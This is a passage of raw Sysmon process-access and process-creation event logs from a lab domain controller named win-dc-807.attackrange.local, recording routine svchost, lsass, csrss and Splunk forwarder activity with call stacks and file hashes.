10341000x80000000000000006853Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006852Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006851Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006850Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006849Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.366{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006848Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.365{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006847Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.365{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006846Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.365{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7DA0-5FA1-7E01-000000008801}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006845Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.365{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DA0-5FA1-7E01-000000008801}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006844Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:16.365{D28789B6-7DA0-5FA1-7E01-000000008801}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006875Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.511{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006874Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.511{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006873Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.511{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006872Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.511{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006871Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006870Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006869Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006868Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006867Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006866Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006865Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006864Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006863Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006862Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006861Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:44.401{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006860Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 